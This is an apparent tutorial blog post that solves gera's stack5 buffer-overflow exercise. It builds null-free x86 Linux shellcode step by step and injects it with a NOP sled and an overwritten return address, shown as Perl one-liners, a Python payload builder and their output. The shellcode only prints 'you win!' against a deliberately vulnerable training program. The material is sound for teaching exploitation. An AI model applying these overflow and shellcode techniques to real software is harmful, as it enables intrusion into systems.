Introduction
Now it’s time for Insecure Programming by Example exercise stack5.c, and in the interest of brevity I’ll just go ahead and post the damned thing.
/* stack5-stdin.c *
* specially crafted to feed your brain by gera */
#include <stdio.h>
int main() {
    int cookie;
    char buf[80];
    printf("buf: %08x cookie: %08x\n", &buf, &cookie);
    gets(buf);
    if (cookie == 0x000d0a00)
        printf("you loose!\n");
}
So, what’s new in this version…oh wait, if we set the cookie correctly, it prints out “you loose!”…so what the heck are we supposed to do now?
The answer lies with shellcode. Basically, we are given a buffer to work with, and we need to put instructions directly in the buffer in the form of raw bytes, and jump execution to a point where our shellcode will run. That’s pretty much it. The concept should be pretty familiar at this point, and as you’ll see the execution is not so hard.
Epic Sploits
It’s worth mentioning that these programs are purposely designed to be exploited, and the techniques we are using are among the most basic when it comes to this sort of thing. Though I have no professional experience in this line of work, it cannot all be this straightforward. If you want an example of something truly advanced, explained so even I can grasp the basics, go check out Thomas Ptacek’s write-up of Mark Dowd’s Flash NULL pointer exploit. It gives us a glimpse into what the truly advanced techniques look like, and Thomas does an excellent job of explaining not only how it works (generally) but why it’s such a big deal.
So if I act like I know what I’m talking about, just understand that this is a very useful foundation that we are building together, and if you have enjoyed yourself so far, you will not be bored, because there will be plenty of work to do.
Shellc0dage
There are many ways we can attack the problem of developing the shellcode and making it available to the process to be executed. Thanks to the Internet, there are a great many resources where sample shellcode for all sorts of different systems can be referenced or even automatically generated. But in this brief article I’ll take you through the manual generation of shellcode and then the process of getting it to run on the vulnerable program step-by-step. The shellcode chapter of Hacking: The Art of Exploitation was heavily used as a reference for my original solution (which I can no longer remember), and I’m sure I’ll go back there for more looks in the course of writing this post.
Abstractions of Abstractions
NOTE: This is an area I’m still learning a lot about, if I gloss something over to the point that it’s incorrect or inaccurate, please let me know and I’ll fix it.
So, let’s talk real quick about the difference between instructions, system calls, and C library functions or calls. Essentially, at the lowest level you have x86 assembly instructions, like push, pop, call, mov, and ret. These instructions are hard coded into the logic of the processor, and though the implementation of them in actual transistor logic may change, you generally won’t see the interface to the instruction change at all (for instance, the number or type of arguments it takes). The list of instructions (and of course the registers) that a processor supports is essentially what makes a processor x86-compatible.
NOTE: in the course of doing research for this article, it seems like the system calls and the C library functions are typically both reached through libc, or the libc project/package/whatever. The distinction between the two that I’m observing here is still valid, because they are used in two completely different ways, and each belongs to a different set of standards. I’d think of them as two sides of the same coin, but I’m sure that analogy breaks down at some point, as all do.
The next layer up is kernel system calls. A system call is a numbered entry point into the kernel: you load the call number and its arguments into registers, trigger a trap (int 0x80 on 32-bit x86 Linux), and the kernel “does stuff” with the given arguments on your behalf. System calls are not inherent to the x86 processor; rather, they are inherent to the kernel and operating system that you are using at the time. The thin wrappers that C programs normally call, such as write(), live in libc (typically under /lib), while the kernel code behind them is mostly written in C, with a little assembly at the entry point. Their purpose (along with the entire kernel, really) is to provide a standardized interface to the hardware of the system. Any time you print something to the screen, type something, use your microphone to record something, or listen to music through your headphones, you are using the standard resources provided by the kernel and the kernel’s system calls to do so. For the curious, we have not yet used system calls directly (only through further-up abstractions such as printf(), which we’ll talk about next) but we will make extensive use of them when we write our shellcode.
The final and highest layer of abstraction we’ll deal with is the C standard library functions, declared in the various header files typically located in /usr/include on your average Linux distribution. The C standard library is defined through an ISO standard, and each operating system that wants to offer C capabilities past what the compiler itself provides, in a way consistent with other operating systems or kernels, needs to implement the standard functions the library defines. Every time you use #include <stdio.h> to call printf(), or #include <string.h> to call strcpy(), you are using functions defined by the ISO standard for C and implemented in libc, which is mapped into the memory of every process that links against it (at a predictable location, when address space randomization is not in play).
Oh boy, this section sure does gloss over quite a bit that might be worth mentioning. I’m sure it will come up at some point later on. In the meantime, if you want to do some extracurricular reading, a great reference, perhaps the only one you’ll ever need, is Advanced Programming in the UNIX Environment by W. Richard Stevens and Stephen Rago. It’s a bit above my head, but it will serve you well if you ever need to look something up…ever. If you want a gentler introduction that is very outdated but still quite informative and fun to read, I’d recommend The UNIX Programming Environment by Brian Kernighan and Rob Pike. I read this book and really liked it.
Enough Edumacation, Let’s Break Shit
Now I’m going to briefly outline how to build the shellcode we’re going to use, and then briefly cover some quick optimizations that get rid of null bytes and wasted space in the shellcode. Null bytes are not a problem for gets(), which only stops at a newline or at end of input, but if in the future you use strcpy() or some other function that treats a null byte as the end of a string to get your shellcode into memory, the first null byte will cut the copy short.
We are going to use the write() system call for Linux to actually print out our string. I guess that there are others that are available to print output to a file descriptor (STDOUT in our case), and I was hoping to find where printf() or puts() from the C standard library directly referenced the write() system call to satisfy personal curiosity, but couldn’t.
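Before dropping down to assembly, it may help to see the three arguments of write() in isolation. The following is only a sketch in Python, whose os.write() is a thin wrapper over the same system call; the helper name write_all is my own invention for illustration and is not part of the exercise.

```python
import os


def write_all(fd, data):
    """Write every byte of data to fd, retrying after short writes."""
    written = 0
    while written < len(data):
        # os.write(fd, buf) wraps write(fd, buf, count) and returns the
        # number of bytes the kernel actually accepted.
        written += os.write(fd, data[written:])
    return written


if __name__ == "__main__":
    message = b"you win!\n"
    # File descriptor 1 is STDOUT, the same value the shellcode puts in EBX.
    count = write_all(1, message)
    assert count == len(message)
```

The file descriptor, the buffer, and the byte count here are the same three values that end up in EBX, ECX, and EDX in the assembly version.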
Assembly code is written using mnemonics, which are basically English-like names that map directly onto the numeric opcodes (one or more bytes each) that make up the machine language the processor understands. Whenever we use push or something like it with an argument after it, or whenever we see it in the output of objdump -D or another disassembler, we need to remember that it’s just another abstraction. The job of turning mnemonic instructions into actual machine language is that of the assembler. The assembler we’re going to use is a fairly standard and free one called the Netwide Assembler (nasm).
section .data                   ; data segment
msg db "you win!", 0x0a, 0x0d   ; the string to print, followed by LF and CR bytes

section .text                   ; text segment, where the code is
global _start                   ; default entry point for ELF linking

_start:
; SYSCALL: ssize_t write(int fd, const void *buf, size_t count);
; Our syscall: write(1, msg, 10)
    mov eax, 4      ; put 4 into EAX register, syscall write is #4 (/usr/include/asm-i386/unistd.h)
    mov ebx, 1      ; put 1 into EBX, since file descriptor we want is STDOUT
    mov ecx, msg    ; put the address of the string into ECX, since it's what we want to print
    mov edx, 10     ; put 10 into EDX, since string is 10 bytes (8 characters plus LF and CR)
    int 0x80        ; tell the kernel to do a syscall

; SYSCALL: void _exit(int status);
; Our syscall: exit(0) meaning that there were no problems
    mov eax, 1      ; put 1 into EAX since exit() is syscall #1
    mov ebx, 0      ; put 0 into EBX, since that's our one and only argument to exit()
    int 0x80        ; tell the kernel to do a syscall
The above code is an example of how one might write a program in assembly to print out “you win!”. The code is commented, and the comments explain each step. If we wanted to assemble this code into a proper ELF binary for Linux, we’d have to assemble the code into an object file with nasm, and then link the executable by running the ld command.
hacking@hacking-theart:~/InsecureProgramming $ file printyouwin.asm
printyouwin.asm: ASCII English text
hacking@hacking-theart:~/InsecureProgramming $ nasm -f elf printyouwin.asm
hacking@hacking-theart:~/InsecureProgramming $ ls -la printyouwin.*
-rwxr--r-- 1 hacking hacking 651 2009-12-12 11:08 printyouwin.asm
-rw-r--r-- 1 hacking hacking 544 2009-12-12 11:09 printyouwin.o
hacking@hacking-theart:~/InsecureProgramming $ file printyouwin.o
printyouwin.o: ELF 32-bit LSB relocatable, Intel 80386, version 1 (SYSV), not stripped
hacking@hacking-theart:~/InsecureProgramming $ ld -o printyouwin printyouwin.o
ld: warning: cannot find entry symbol _start; defaulting to 0000000008048060
hacking@hacking-theart:~/InsecureProgramming $ file printyouwin
printyouwin: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
hacking@hacking-theart:~/InsecureProgramming $ ./printyouwin
you win!
This is all well and good, however since we are using our shellcode within another already-started process, we won’t have the ability to reference the memory in the various sections of the executable to retrieve static values such as the string “you win!” which will be passed as an argument to the write() call. Since we know the other integer values for the 2 remaining arguments to write(), and can provide them directly, that is not such an issue because we can populate those registers with a mov instruction. But we need a way to get the string value we want to print into the ECX register, so write() will print it out for us. Enter the stack.
BITS 32                         ; Tell nasm this is 32-bit code.

    call mark_below             ; Call below the string to instructions
    db "you win!", 0x0a, 0x0d   ; with newline and carriage return bytes.

mark_below:
; ssize_t write(int fd, const void *buf, size_t count);
    pop ecx         ; Pop the return address (string ptr) into ecx.
    mov eax, 4      ; Write syscall #.
    mov ebx, 1      ; STDOUT file descriptor
    mov edx, 10     ; Length of the string
    int 0x80        ; Do syscall: write(1, string, 10)

; void _exit(int status);
    mov eax, 1      ; Exit syscall #
    mov ebx, 0      ; Status = 0
    int 0x80        ; Do syscall: exit(0)
This code relies on a side effect of the call instruction: call pushes the address of whatever immediately follows it onto the stack as the return address. Here, the thing that follows the call is our string, so the very first instruction after the jump pops that address back off the stack into the ECX register. That address is then used as the pointer to the string that we want to print.
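To make the call trick concrete, here is a rough Python sketch that builds the call-plus-string prefix by hand and works out which address ends up on the stack. It assumes the assembler picks the 5-byte form of call (opcode 0xE8 followed by a 32-bit relative displacement); the function names and the example load address are made up for illustration.

```python
import struct

MESSAGE = b"you win!\n\r"  # the same 10 bytes as the db line above


def call_over(data):
    """Encode a `call rel32` (opcode 0xE8) that skips over data."""
    # rel32 is measured from the end of the 5-byte call instruction,
    # so hopping over len(data) bytes needs a displacement of len(data).
    return b"\xe8" + struct.pack("<i", len(data)) + data


def pushed_return_address(load_address):
    """Address the CPU pushes: the byte right after the 5-byte call."""
    return load_address + 5


def call_target(load_address, code):
    """Address execution continues at after the call."""
    rel32 = struct.unpack_from("<i", code, 1)[0]
    return pushed_return_address(load_address) + rel32


if __name__ == "__main__":
    code = call_over(MESSAGE)
    base = 0xbffff7b0  # hypothetical address where the code gets loaded
    ret = pushed_return_address(base)
    print("call bytes:     ", code[:5].hex())
    print("pushed address: ", hex(ret))
    print("string there:   ", code[ret - base:ret - base + 8])
    print("execution jumps:", hex(call_target(base, code)))
```

The point to notice is that the pushed address is always relative to wherever the code happens to land, which is exactly why the shellcode never needs to know its own absolute address ahead of time.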
We’ll want to translate this code not to the ELF format, but to raw machine instructions, since we want to inject it into a running process. To do this, we’ll run nasm without any format argument (it then emits a flat binary), and then I’ll show you how many bytes the assembled shellcode takes up and what it looks like when disassembled. One warning about the disassembly: ndisasm has no way of knowing which bytes are the string, so it decodes them as instructions too, and the nonsense that results swallows the pop ecx and the first mov. Remember that, since we only have control of the 80 byte buffer, we only really have that many bytes to work with, give or take a few, so our shellcode cannot be too bloated.
hacking@hacking-theart:~/InsecureProgramming $ nasm -o printyouwin1 printyouwin1.asm
hacking@hacking-theart:~/InsecureProgramming $ file printyouwin1*
printyouwin1:     data
printyouwin1.asm: ASCII English text
printyouwin1.o:   ELF 32-bit LSB relocatable, Intel 80386, version 1 (SYSV), not stripped
hacking@hacking-theart:~/InsecureProgramming $ ls -l printyouwin1
-rw-r--r-- 1 hacking hacking 45 2009-12-12 11:57 printyouwin1
hacking@hacking-theart:~/InsecureProgramming $ wc -c printyouwin1
45 printyouwin1
hacking@hacking-theart:~/InsecureProgramming $ hexdump -C printyouwin1
00000000  e8 0a 00 00 00 79 6f 75  20 77 69 6e 21 0a 0d 59  |.....you win!..Y|
00000010  b8 04 00 00 00 bb 01 00  00 00 ba 0a 00 00 00 cd  |................|
00000020  80 b8 01 00 00 00 bb 00  00 00 00 cd 80           |.............|
0000002d
hacking@hacking-theart:~/InsecureProgramming $ objdump -D printyouwin1
objdump: printyouwin1: File format not recognized
hacking@hacking-theart:~/InsecureProgramming $ ndisasm -b32 printyouwin1
00000000  E80A000000        call 0xf
00000005  796F              jns 0x76
00000007  7520              jnz 0x29
00000009  7769              ja 0x74
0000000B  6E                outsb
0000000C  210A              and [edx],ecx
0000000E  0D59B80400        or eax,0x4b859
00000013  0000              add [eax],al
00000015  BB01000000        mov ebx,0x1
0000001A  BA0A000000        mov edx,0xa
0000001F  CD80              int 0x80
00000021  B801000000        mov eax,0x1
00000026  BB00000000        mov ebx,0x0
0000002B  CD80              int 0x80
This shellcode, while awesome, is not foolproof for many scenarios. If the vulnerable program reads its input with gets(), we cannot include a newline anywhere in the payload, because gets() stops reading at the first one. If it uses a typical string-based function such as strcpy(), the null bytes will kill us by terminating the copy early instead. Here is a slimmed down version of the shellcode that uses a few techniques to avoid both: XORing registers against themselves to zero out all 32 bits, then loading small values into just the low byte (al, dl) so no zero padding is needed; smaller instructions such as jmp short; and placing the call at the bottom so that it jumps backwards, which makes its relative offset a negative number that is encoded in two’s complement as 0xff bytes rather than nulls. It also drops the 0x0a and 0x0d newline and carriage return bytes from the string, since the 0x0a would end gets() prematurely.
BITS 32             ; Tell nasm this is 32-bit code.

    jmp short one   ; Jump down to a call at the end.

two:
; ssize_t write(int fd, const void *buf, size_t count);
    pop ecx         ; Pop the return address (string ptr) into ecx.
    xor eax, eax    ; Zero out full 32 bits of eax register.
    mov al, 4       ; Write syscall #4 to the low byte of eax.
    xor ebx, ebx    ; Zero out ebx.
    inc ebx         ; Increment ebx to 1, STDOUT file descriptor.
    xor edx, edx    ; Zero out edx.
    mov dl, 8       ; Length of the string
    int 0x80        ; Do syscall: write(1, string, 8)

; void _exit(int status);
    mov al, 1       ; Exit syscall #1; eax holds write()'s return value (8), so the top 3 bytes are still zero.
    dec ebx         ; Decrement ebx back down to 0 for status = 0.
    int 0x80        ; Do syscall: exit(0)

one:
    call two        ; Call back upwards to avoid null bytes
    db "you win!"   ; with no newline or carriage return bytes.
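Why does calling backwards get rid of the null bytes? Relative jumps and calls store the distance from the end of the instruction to the target, and the sign of that distance decides what the padding bytes look like. Here is a small Python sketch of the arithmetic, using offsets taken from the ndisasm listings in this post; the helper names are mine.

```python
import struct


def rel32_bytes(next_instruction, target):
    """Little-endian 32-bit displacement from next_instruction to target."""
    return struct.pack("<i", target - next_instruction)


def rel8_bytes(next_instruction, target):
    """Signed 8-bit displacement, as used by `jmp short`."""
    return struct.pack("<b", target - next_instruction)


if __name__ == "__main__":
    # First version: 5-byte call at 0x00 jumping forward to 0x0f.
    print("forward call: ", rel32_bytes(0x05, 0x0f).hex())
    # Slimmed version: 5-byte call at 0x15 jumping backward to 0x02.
    print("backward call:", rel32_bytes(0x1a, 0x02).hex())
    # Slimmed version: 2-byte jmp short at 0x00 jumping forward to 0x15.
    print("jmp short:    ", rel8_bytes(0x02, 0x15).hex())
```

A small positive displacement is padded out with 0x00 bytes, while a small negative one is padded with 0xff, and the 8-bit form of jmp has no padding at all.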
And here is us, assembling the code and then putting it into the buffer, prefixed with a NOP sled to be executed successfully! You win!
hacking@hacking-theart:~/InsecureProgramming $ nasm -o stack5shellcode.out stack5shellcode.s
hacking@hacking-theart:~/InsecureProgramming $ md5sum stack5shellcode*
4c8c79ca6379f417c750f1712fbb5652  stack5shellcode
0f2668754e312f90cef8dff7f6c90723  stack5shellcode.bytes
4c8c79ca6379f417c750f1712fbb5652  stack5shellcode.out
bd6be6a87c2eee6e0fab27f13ba5853d  stack5shellcode.s
hacking@hacking-theart:~/InsecureProgramming $ ndisasm -b32 stack5shellcode.out
00000000  EB13              jmp short 0x15
00000002  59                pop ecx
00000003  31C0              xor eax,eax
00000005  B004              mov al,0x4
00000007  31DB              xor ebx,ebx
00000009  43                inc ebx
0000000A  31D2              xor edx,edx
0000000C  B208              mov dl,0x8
0000000E  CD80              int 0x80
00000010  B001              mov al,0x1
00000012  4B                dec ebx
00000013  CD80              int 0x80
00000015  E8E8FFFFFF        call 0x2
0000001A  796F              jns 0x8b
0000001C  7520              jnz 0x3e
0000001E  7769              ja 0x89
00000020  6E                outsb
00000021  21                db 0x21
hacking@hacking-theart:~/InsecureProgramming $ hexdump -C stack5shellcode.out
00000000  eb 13 59 31 c0 b0 04 31  db 43 31 d2 b2 08 cd 80  |..Y1...1.C1.....|
00000010  b0 01 4b cd 80 e8 e8 ff  ff ff 79 6f 75 20 77 69  |..K.......you wi|
00000020  6e 21                                             |n!|
00000022
hacking@hacking-theart:~/InsecureProgramming $ perl -e 'print "\x90" x 74 . "\xeb\x13\x59\x31\xc0\xb0\x04\x31\xdb\x43\x31\xd2\xb2\x08\xcd\x80\xb0\x01\x4b\xcd\x80\xe8\xe8\xff\xff\xff\x79\x6f\x75\x20\x77\x69\x6e\x21" . "\xb0\xf7\xff\xbf\n";' | ./stack5
buf: bffff7b0 cookie: bffff80c
you win!hacking@hacking-theart:~/InsecureProgramming $
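If you’d rather not eyeball a hexdump for troublesome bytes, the check is easy to automate. This is just a sketch: the two byte strings are copied from the hexdump -C listings in this post, and the function name bad_offsets and its default set of bad bytes (null for strcpy(), 0x0a for gets()) are my own choices.

```python
# First attempt, 45 bytes, copied from the hexdump of printyouwin1.
FIRST_ATTEMPT = bytes.fromhex(
    "e80a000000796f752077696e210a0d59"
    "b804000000bb01000000ba0a000000cd"
    "80b801000000bb00000000cd80"
)

# Slimmed version, 34 bytes, copied from the hexdump of stack5shellcode.out.
SLIMMED = bytes.fromhex(
    "eb135931c0b00431db4331d2b208cd80"
    "b0014bcd80e8e8ffffff796f75207769"
    "6e21"
)


def bad_offsets(payload, bad=b"\x00\x0a"):
    """Return the offset of every byte in payload that appears in bad."""
    return [i for i, byte in enumerate(payload) if byte in bad]


if __name__ == "__main__":
    for name, code in (("first attempt", FIRST_ATTEMPT), ("slimmed", SLIMMED)):
        print(name, len(code), "bytes, bad offsets:", bad_offsets(code))
```

The same function can be pointed at the return address bytes as well, since a null or newline there would cut the payload short just the same.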
I wanted to make sure that a NOP sled was an understood concept, but really we could have just as easily put the shellcode at the very beginning of the buffer, padded the rest with junk, and executed all the same.
root@hacking-theart:/home/hacking/InsecureProgramming # perl -e 'print "\xeb\x13\x59\x31\xc0\xb0\x04\x31\xdb\x43\x31\xd2\xb2\x08\xcd\x80\xb0\x01\x4b\xcd\x80\xe8\xe8\xff\xff\xff\x79\x6f\x75\x20\x77\x69\x6e\x21" . "A" x 74 . "\x80\xf7\xff\xbf\n";' | ./stack5
buf: bffff780 cookie: bffff7dc
you win!root@hacking-theart:/home/hacking/InsecureProgramming #
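Both layouts follow the same recipe: fill the 108 bytes up to the saved return address, then overwrite that address with the start of buf. Here is a sketch of the two Perl one-liners as Python functions. The 108-byte offset (74 + 34) and the two addresses are simply read off the runs above and will differ on another machine or build; the function names are hypothetical.

```python
import struct

# The 34-byte shellcode from the hexdump of stack5shellcode.out.
SHELLCODE = bytes.fromhex(
    "eb135931c0b00431db4331d2b208cd80"
    "b0014bcd80e8e8ffffff796f75207769"
    "6e21"
)

# Distance from buf to the saved return address, inferred from the runs
# above (74 filler bytes + 34 shellcode bytes). An assumption, not a constant.
RET_OFFSET = 108


def _filler_length(offset):
    if len(SHELLCODE) > offset:
        raise ValueError("shellcode does not fit before the return address")
    return offset - len(SHELLCODE)


def sled_first(ret_addr, offset=RET_OFFSET):
    """NOP sled, then shellcode, then the little-endian return address."""
    sled = b"\x90" * _filler_length(offset)
    return sled + SHELLCODE + struct.pack("<I", ret_addr) + b"\n"


def shellcode_first(ret_addr, offset=RET_OFFSET, filler=b"A"):
    """Shellcode at the start of buf, junk filler, then the return address."""
    junk = filler * _filler_length(offset)
    return SHELLCODE + junk + struct.pack("<I", ret_addr) + b"\n"


if __name__ == "__main__":
    # Addresses printed by ./stack5 in the two runs above.
    print(sled_first(0xbffff7b0).hex())
    print(shellcode_first(0xbffff780).hex())
```

To actually feed one of these to the program you would write the raw bytes rather than the hex, for example with sys.stdout.buffer.write(), and pipe that into ./stack5. With the sled, any return address that lands inside the run of NOPs works; without it, the address has to hit the first byte of the shellcode exactly.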
And that (finally) wraps us up for the stackN.c series of stack buffer overflows designed and provided for free by gera of Core. I’ll probably never, ever write about these again, since it was pretty laborious, but I hope you didn’t find reading about it so. I used a great many references while completing these write-ups, and I recommend them all, but if you can’t afford to go out and buy $500.00 worth of new books, you might want to check out the Safari Books Online site that O’Reilly offers, as it’s a pretty good deal (though less so now that they eliminated the 5-book shelf). The Internet and Google (and Bing!) are your friends as well. Go forth, and break things!